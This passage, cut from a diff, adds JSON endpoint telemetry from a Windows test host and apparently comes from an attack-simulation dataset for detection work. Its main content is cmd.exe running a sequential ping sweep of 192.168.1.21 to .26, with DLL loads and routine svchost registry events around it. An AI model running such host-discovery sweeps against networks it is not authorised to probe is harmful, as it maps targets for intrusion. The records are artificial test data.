131883572086830000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.21", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6828, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572086990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572086990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572086990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572086990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572086990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": 
"C:\\Windows\\System32\\msvcrt.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572086990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572086990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572086990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572086990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572086990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572086990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572086990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" + }, + { + "event_type": "process", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572091990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.22", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4740, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572092140000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4740, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572092140000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4740, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572092140000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4740, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572092140000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": 
"C:\\Windows\\System32\\KernelBase.dll", + "pid": 4740, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572092140000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4740, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572092140000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4740, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572092140000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4740, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572092140000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4740, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572092140000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4740, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572092140000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4740, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572092140000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4740, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572092140000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" + }, + { + "event_type": "registry", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack\\SettingsRequests", + "registry_value": "SettingsRequests", + "timestamp": 131883572094330000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" + }, + { + "event_type": "registry", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack\\SettingsRequests", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack\\SettingsRequests\\LastDownloadTime", + "registry_value": "LastDownloadTime", + "timestamp": 131883572094330000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" + }, + { + "event_type": "file", + "file_name": "e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", + "file_path": "C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "timestamp": 131883572094330000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" + }, + { + "event_type": "file", + "file_name": "e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", + "file_path": 
"C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "timestamp": 131883572094330000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" + }, + { + "event_type": "process", + "pid": 4740, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572096830000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.23", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5812, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572096980000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572096990000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572096990000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 
131883572096990000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572096990000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572096990000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572096990000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572096990000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572096990000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572096990000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" + }, + { + "event_type": "image_load", 
+ "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572096990000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572096990000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" + }, + { + "event_type": "process", + "pid": 5812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572101840000, + "unique_pid": "{42FC7E13-CB59-5C05-0000-0010A9AA5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.24", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7672, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572101980000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572101990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572101990000, + "unique_pid": 
"{42FC7E13-CB5A-5C05-0000-001018AD5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572101990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572101990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572101990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572101990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572101990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572101990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + 
"image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572101990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572101990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572101990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" + }, + { + "event_type": "process", + "pid": 7672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572106830000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001018AD5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.25", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7552, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572106990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572106990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" + 
}, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572106990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572106990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572106990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572106990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572106990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572106990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": 
"C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572106990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572106990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572106990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572106990000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\BITS", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\BITS\\Start", + "registry_value": "Start", + "timestamp": 131883572107770000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", + "registry_value": "BITS", + "timestamp": 131883572108080000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + 
"event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS\\PerfMMFileName", + "registry_value": "PerfMMFileName", + "timestamp": 131883572108080000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "process", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "subtype": "terminate", + "timestamp": 131883572108080000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "process", + "pid": 7552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572111840000, + "unique_pid": "{42FC7E13-CB5A-5C05-0000-001097AF5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.26", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6840, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572111980000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6840, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572111990000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6840, + "process_name": "PING.EXE", + 
"process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572111990000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6840, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572111990000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6840, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572111990000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6840, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572111990000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6840, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572111990000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6840, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572111990000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6840, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572111990000, + "unique_pid": 
"{42FC7E13-CB5B-5C05-0000-001091B25101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6840, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572111990000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6840, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572111990000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6840, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572111990000, + 